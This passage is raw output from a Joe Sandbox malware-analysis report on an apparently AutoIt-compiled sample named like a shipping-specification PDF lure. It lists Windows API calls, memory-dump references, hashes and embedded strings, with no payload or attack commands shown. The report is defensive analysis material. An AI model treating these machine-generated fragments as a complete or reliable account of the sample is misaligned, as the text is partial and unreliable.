                                       • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                      • String ID:
                                      • API String ID: 3521893082-0
                                      • Opcode ID: 7c24b2763072cdcbf3bc83756ce25bba5eb82282ccb12b22b9094b81f37d0e7f
                                      • Instruction ID: 2a08d7f8bdd0023a7b5e55fee49ffd43d5aac24c666b6d9dc73d57ae658323d2
                                      • Opcode Fuzzy Hash: 7c24b2763072cdcbf3bc83756ce25bba5eb82282ccb12b22b9094b81f37d0e7f
                                      • Instruction Fuzzy Hash: E2915E71408301BFDB129F64DC48E6BBBADFB8A325F100A29F962D65E0D771E944CB52
                                      APIs
                                      • DestroyWindow.USER32 ref: 0035B98B
                                      • DeleteObject.GDI32(00000000), ref: 0035B9CD
                                      • DeleteObject.GDI32(00000000), ref: 0035B9D8
                                      • DestroyIcon.USER32(00000000), ref: 0035B9E3
                                      • DestroyWindow.USER32(00000000), ref: 0035B9EE
                                      • SendMessageW.USER32(?,00001308,?,00000000), ref: 003BD2AA
                                      • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 003BD2E3
                                      • MoveWindow.USER32(00000000,?,?,?,?,00000000), ref: 003BD711
                                        • Part of subcall function 0035B9FF: InvalidateRect.USER32(?,00000000,00000001,?,?,?,0035B759,?,00000000,?,?,?,?,0035B72B,00000000,?), ref: 0035BA58
                                      • SendMessageW.USER32 ref: 003BD758
                                      • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 003BD76F
                                      • ImageList_Destroy.COMCTL32(00000000), ref: 003BD785
                                      • ImageList_Destroy.COMCTL32(00000000), ref: 003BD790
                                       Memory Dump Source
                                       • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                       • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                      • String ID: 0
                                      • API String ID: 464785882-4108050209
                                      • Opcode ID: 358728c1a17285edebbd54a39650f17d6a2c3796e3e799081e61e3e33c679f46
                                      • Instruction ID: 02220358ca7dfa75f05fd2246a56ad2e17666b41c9b5887f96d1e26fc11f5668
                                      • Opcode Fuzzy Hash: 358728c1a17285edebbd54a39650f17d6a2c3796e3e799081e61e3e33c679f46
                                      • Instruction Fuzzy Hash: 09129C34204201DFDB26CF28C884FA9BBE5FF45309F554569FA89CBA62DB31E845CB91
                                      APIs
                                      • SetErrorMode.KERNEL32(00000001), ref: 0038DBD6
                                      • GetDriveTypeW.KERNEL32(?,003DDC54,?,\\.\,003DDC00), ref: 0038DCC3
                                      • SetErrorMode.KERNEL32(00000000,003DDC54,?,\\.\,003DDC00), ref: 0038DE29
                                       Memory Dump Source
                                       • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                       • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: ErrorMode$DriveType
                                      • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                      • API String ID: 2907320926-4222207086
                                      • Opcode ID: 9912ca1aa313036f64d337dd5c83fb8e4cc6f5c1e546277dcdc2ea451e5b9334
                                      • Instruction ID: cf7f2e8e7e5f194033834595aa27f857ab3fb6b08c41a637c32d044737ca2b00
                                      • Opcode Fuzzy Hash: 9912ca1aa313036f64d337dd5c83fb8e4cc6f5c1e546277dcdc2ea451e5b9334
                                      • Instruction Fuzzy Hash: 2B519F30248306AB8613FF11C8A28B9B7A4FF94701F24599AF5079F6E5DB60ED49DB42
                                      APIs
                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013,?,?,?), ref: 003AC788
                                      • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 003AC83E
                                      • SendMessageW.USER32(?,00001102,00000002,?), ref: 003AC859
                                      • SendMessageW.USER32(?,000000F1,?,00000000), ref: 003ACB15
                                       Memory Dump Source
                                       • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                       • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: MessageSend$Window
                                      • String ID: 0
                                      • API String ID: 2326795674-4108050209
                                      • Opcode ID: b6451e6790af14b94f1c4727e49705c40e6d22c6c3f3a7916c92c6912d29b9dc
                                      • Instruction ID: 884cee19c4fa45d3a0e2034a384e0eba9cdabb94728788721242db46a8e91ef2
                                      • Opcode Fuzzy Hash: b6451e6790af14b94f1c4727e49705c40e6d22c6c3f3a7916c92c6912d29b9dc
                                      • Instruction Fuzzy Hash: 3FF1E471114301AFD7278F28CC89BAABBE8FF4A314F04162DF599D62A1C775D845CBA1
                                      APIs
                                      • CharUpperBuffW.USER32(?,?,003DDC00), ref: 003A6449
                                       Memory Dump Source
                                       • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                       • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: BuffCharUpper
                                      • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                      • API String ID: 3964851224-45149045
                                      • Opcode ID: 2a00edc7ee960d881ad86e091d21f841186f5ba9f9ba23e34f7317b7603d7629
                                      • Instruction ID: 97e137ba21a01f43c48c4d887496b7afd8e5bb568f2194f96c877290e36e70e7
                                      • Opcode Fuzzy Hash: 2a00edc7ee960d881ad86e091d21f841186f5ba9f9ba23e34f7317b7603d7629
                                      • Instruction Fuzzy Hash: 4BC1A1342042158BCB17EF10C552E6EB7E9EF96344F094858F8965F2B2DB25EE4ACB42
                                      APIs
                                      • GetSysColor.USER32(00000012), ref: 003AD5AE
                                      • SetTextColor.GDI32(?,?), ref: 003AD5B2
                                      • GetSysColorBrush.USER32(0000000F), ref: 003AD5C8
                                      • GetSysColor.USER32(0000000F), ref: 003AD5D3
                                      • CreateSolidBrush.GDI32(?), ref: 003AD5D8
                                      • GetSysColor.USER32(00000011), ref: 003AD5F0
                                      • CreatePen.GDI32(00000000,00000001,00743C00), ref: 003AD5FE
                                      • SelectObject.GDI32(?,00000000), ref: 003AD60F
                                      • SetBkColor.GDI32(?,00000000), ref: 003AD618
                                      • SelectObject.GDI32(?,?), ref: 003AD625
                                      • InflateRect.USER32(?,000000FF,000000FF), ref: 003AD644
                                      • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 003AD65B
                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 003AD670
                                      • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 003AD698
                                      • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 003AD6BF
                                      • InflateRect.USER32(?,000000FD,000000FD), ref: 003AD6DD
                                      • DrawFocusRect.USER32(?,?), ref: 003AD6E8
                                      • GetSysColor.USER32(00000011), ref: 003AD6F6
                                      • SetTextColor.GDI32(?,00000000), ref: 003AD6FE
                                      • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 003AD712
                                      • SelectObject.GDI32(?,003AD2A5), ref: 003AD729
                                      • DeleteObject.GDI32(?), ref: 003AD734
                                      • SelectObject.GDI32(?,?), ref: 003AD73A
                                      • DeleteObject.GDI32(?), ref: 003AD73F
                                      • SetTextColor.GDI32(?,?), ref: 003AD745
                                      • SetBkColor.GDI32(?,?), ref: 003AD74F
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                       • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                      • String ID:
                                      • API String ID: 1996641542-0
                                      • Opcode ID: 80467e202baba4388c025a3d4b7dbf034d6c70715c9f6fb84dd0c28cc01fa7d2
                                      • Instruction ID: e4e454884cb07f9d8975261b7b2dd10c0ada7fcf2f02fe52f605fc84fc7606dc
                                      • Opcode Fuzzy Hash: 80467e202baba4388c025a3d4b7dbf034d6c70715c9f6fb84dd0c28cc01fa7d2
                                      • Instruction Fuzzy Hash: 44513B71900218AFDB129FA8DC48EAEBB79FB09324F154525F916EB2A1D771AA40CF50
                                       Memory Dump Source
                                       • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                       • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: Window$Foreground
                                      • String ID: ACTIVE$ALL$CLASS$H+?$HANDLE$INSTANCE$L+?$LAST$P+?$REGEXPCLASS$REGEXPTITLE$T+?$TITLE
                                      • API String ID: 62970417-157867648
                                      • Opcode ID: 8d537ea4e3639331f2a0eb80ef36e9d252a45e35ea6ac9d22327d503bd479ada
                                      • Instruction ID: 1520f3261fa60d5f09bdcce4877ea6090edaf3b500b79eaf3a5036cb4ba45563
                                      • Opcode Fuzzy Hash: 8d537ea4e3639331f2a0eb80ef36e9d252a45e35ea6ac9d22327d503bd479ada
                                      • Instruction Fuzzy Hash: C0D184305086469BCB07EF10C4819EBBBF4BF54348F504A19F95A9F9A1DB30F99ACB91
                                      APIs
                                      • GetCursorPos.USER32(?), ref: 003A778A
                                      • GetDesktopWindow.USER32 ref: 003A779F
                                      • GetWindowRect.USER32(00000000), ref: 003A77A6
                                      • GetWindowLongW.USER32(?,000000F0), ref: 003A7808
                                      • DestroyWindow.USER32(?), ref: 003A7834
                                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 003A785D
                                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 003A787B
                                      • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 003A78A1
                                      • SendMessageW.USER32(?,00000421,?,?), ref: 003A78B6
                                      • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 003A78C9
                                      • IsWindowVisible.USER32(?), ref: 003A78E9
                                      • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 003A7904
                                      • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 003A7918
                                      • GetWindowRect.USER32(?,?), ref: 003A7930
                                      • MonitorFromPoint.USER32(?,?,00000002), ref: 003A7956
                                      • GetMonitorInfoW.USER32 ref: 003A7970
                                      • CopyRect.USER32(?,?), ref: 003A7987
                                      • SendMessageW.USER32(?,00000412,00000000), ref: 003A79F2
                                       Memory Dump Source
                                       • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                       • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                      • String ID: ($0$tooltips_class32
                                      • API String ID: 698492251-4156429822
                                      • Opcode ID: f36bc88da0c808741a71d6111c04c7fb68f2d90915bd09b215abb230dc57b395
                                      • Instruction ID: 995399b566d8b35c13ad8fd5683c7981b9e473cb6e5471d01f55ed232eaaa833
                                      • Opcode Fuzzy Hash: f36bc88da0c808741a71d6111c04c7fb68f2d90915bd09b215abb230dc57b395
                                      • Instruction Fuzzy Hash: B1B18F71608300AFD706DF64CD89B6ABBE8FF89310F008A1DF5999B291D774E805CB91
                                      APIs
                                      • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 003AB7B0
                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 003AB7C1
                                      • CharNextW.USER32(0000014E), ref: 003AB7F0
                                      • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 003AB831
                                      • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 003AB847
                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 003AB858
                                      • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 003AB875
                                      • SetWindowTextW.USER32(?,0000014E), ref: 003AB8C7
                                      • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 003AB8DD
                                      • SendMessageW.USER32(?,00001002,00000000,?), ref: 003AB90E
                                      • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 003AB97C
                                      • SendMessageW.USER32 ref: 003ABA05
                                      • SendMessageW.USER32(?,00001074,?,00000001), ref: 003ABA5D
                                      • SendMessageW.USER32(?,0000133D,?,?), ref: 003ABB0A
                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 003ABB2C
                                      • GetMenuItemInfoW.USER32(?), ref: 003ABB76
                                      • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 003ABBA3
                                      • DrawMenuBar.USER32(?), ref: 003ABBB2
                                      • SetWindowTextW.USER32(?,0000014E), ref: 003ABBDA
                                       Memory Dump Source
                                       • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                       • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: MessageSend$Menu$InfoItemTextWindow$CharDrawInvalidateNextRect
                                      • String ID: 0
                                      • API String ID: 1015379403-4108050209
                                      • Opcode ID: 3f1b41fa42325bec20087b11d9a8193d1c6038221292f809737f01b9707b3c80
                                      • Instruction ID: 714feefb2316ca498c89e77c9f122541ea27b82f197cedc9d0a6462d59663963
                                      • Opcode Fuzzy Hash: 3f1b41fa42325bec20087b11d9a8193d1c6038221292f809737f01b9707b3c80
                                      • Instruction Fuzzy Hash: 24E1A071900218AFDF129FA5CC84EEEBB7CFF06714F10816AF919AA192D7759A41CF60
                                      APIs
                                      • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0035A939
                                      • GetSystemMetrics.USER32(00000007), ref: 0035A941
                                      • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0035A96C
                                      • GetSystemMetrics.USER32(00000008), ref: 0035A974
                                      • GetSystemMetrics.USER32(00000004), ref: 0035A999
                                      • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 0035A9B6
                                      • AdjustWindowRectEx.USER32(000000FF,00000000,00000000,00000000), ref: 0035A9C6
                                      • CreateWindowExW.USER32(00000000,AutoIt v3 GUI,?,00000000,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 0035A9F9
                                      • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 0035AA0D
                                      • GetClientRect.USER32(00000000,000000FF), ref: 0035AA2B
                                      • GetStockObject.GDI32(00000011), ref: 0035AA47
                                      • SendMessageW.USER32(00000000,00000030,00000000), ref: 0035AA52
                                        • Part of subcall function 0035B63C: GetCursorPos.USER32(000000FF), ref: 0035B64F
                                        • Part of subcall function 0035B63C: ScreenToClient.USER32(00000000,000000FF), ref: 0035B66C
                                        • Part of subcall function 0035B63C: GetAsyncKeyState.USER32(00000001), ref: 0035B691
                                        • Part of subcall function 0035B63C: GetAsyncKeyState.USER32(00000002), ref: 0035B69F
                                      • SetTimer.USER32(00000000,00000000,00000028,0035AB87), ref: 0035AA79
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                      • String ID: AutoIt v3 GUI$T.?
                                      • API String ID: 1458621304-528744971
                                      • Opcode ID: 9070007c45f26d3d5cfdf786a4cf5899bab599345bcc4b0abb1dfe668013abf3
                                      • Instruction ID: e7f06b4c6e7486d52aa2978f913bdd9ebaff8b7947ac020ab25c0cfee2af9d8f
                                      • Opcode Fuzzy Hash: 9070007c45f26d3d5cfdf786a4cf5899bab599345bcc4b0abb1dfe668013abf3
                                      • Instruction Fuzzy Hash: E5B16A71A0020A9FDB16DFA8DD45FEE7BA8EB08315F114229FA15E72A0DB74E840CB55
                                      APIs
                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 003A3735
                                      • RegCreateKeyExW.ADVAPI32(?,?,00000000,003DDC00,00000000,?,00000000,?,?), ref: 003A37A3
                                      • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 003A37EB
                                      • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 003A3874
                                      • RegCloseKey.ADVAPI32(?), ref: 003A3B94
                                      • RegCloseKey.ADVAPI32(00000000), ref: 003A3BA1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: Close$ConnectCreateRegistryValue
                                      • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                      • API String ID: 536824911-966354055
                                      • Opcode ID: bd5aae281f0b7196d393df704db863b5cb34a668ca3e417cb6cd402fa8a72d74
                                      • Instruction ID: 857f2c6de29c17f4b0d71bdc74fd1da7883173eb41765f74bcab4562785143ad
                                      • Opcode Fuzzy Hash: bd5aae281f0b7196d393df704db863b5cb34a668ca3e417cb6cd402fa8a72d74
                                      • Instruction Fuzzy Hash: A80237756046019FCB16EF14C851E2AB7E9FF8A720F05845DF99A9F2A2CB30ED01CB81
                                      APIs
                                      • CharUpperBuffW.USER32(?,?), ref: 003A6C56
                                      • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 003A6D16
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: BuffCharMessageSendUpper
                                      • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                      • API String ID: 3974292440-719923060
                                      • Opcode ID: 3d2b1a2dcb23c18d39a81a753d57928218851f9e0b28f015ff7caa1bbf05b776
                                      • Instruction ID: c44d1d38829a9b567b955afdf4672e5f4c6d849eec5010892bdb2cd9dc6cd4ea
                                      • Opcode Fuzzy Hash: 3d2b1a2dcb23c18d39a81a753d57928218851f9e0b28f015ff7caa1bbf05b776
                                      • Instruction Fuzzy Hash: AEA17D342042419FCB16EF20C952E6BB3A5EF45354F148969F9969F3A2DB70ED09CB41
                                      APIs
                                      • LoadIconW.USER32(00000063), ref: 0037EAB0
                                      • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0037EAC2
                                      • SetWindowTextW.USER32(?,?), ref: 0037EAD9
                                      • GetDlgItem.USER32(?,000003EA), ref: 0037EAEE
                                      • SetWindowTextW.USER32(00000000,?), ref: 0037EAF4
                                      • GetDlgItem.USER32(?,000003E9), ref: 0037EB04
                                      • SetWindowTextW.USER32(00000000,?), ref: 0037EB0A
                                      • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 0037EB2B
                                      • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 0037EB45
                                      • GetWindowRect.USER32(?,?), ref: 0037EB4E
                                      • SetWindowTextW.USER32(?,?), ref: 0037EBB9
                                      • GetDesktopWindow.USER32 ref: 0037EBBF
                                      • GetWindowRect.USER32(00000000), ref: 0037EBC6
                                      • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 0037EC12
                                      • GetClientRect.USER32(?,?), ref: 0037EC1F
                                      • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 0037EC44
                                      • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 0037EC6F
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                      • String ID:
                                      • API String ID: 3869813825-0
                                      • Opcode ID: 6f0b6abd46a7001f5aadb42b08d665a40024e672a914b82b0a749e09760e9603
                                      • Instruction ID: 39cda3c6a697ca2337cc38e58a1171a5f9f2bc809f7184b0dccb1cb79b7dd885
                                      • Opcode Fuzzy Hash: 6f0b6abd46a7001f5aadb42b08d665a40024e672a914b82b0a749e09760e9603
                                      • Instruction Fuzzy Hash: C0513E71900709EFDB229FA8CD89F6EBBB9FF08705F014968E586A65A0C774B954CB10
                                      APIs
                                      • LoadCursorW.USER32(00000000,00007F8A), ref: 003979C6
                                      • LoadCursorW.USER32(00000000,00007F00), ref: 003979D1
                                      • LoadCursorW.USER32(00000000,00007F03), ref: 003979DC
                                      • LoadCursorW.USER32(00000000,00007F8B), ref: 003979E7
                                      • LoadCursorW.USER32(00000000,00007F01), ref: 003979F2
                                      • LoadCursorW.USER32(00000000,00007F81), ref: 003979FD
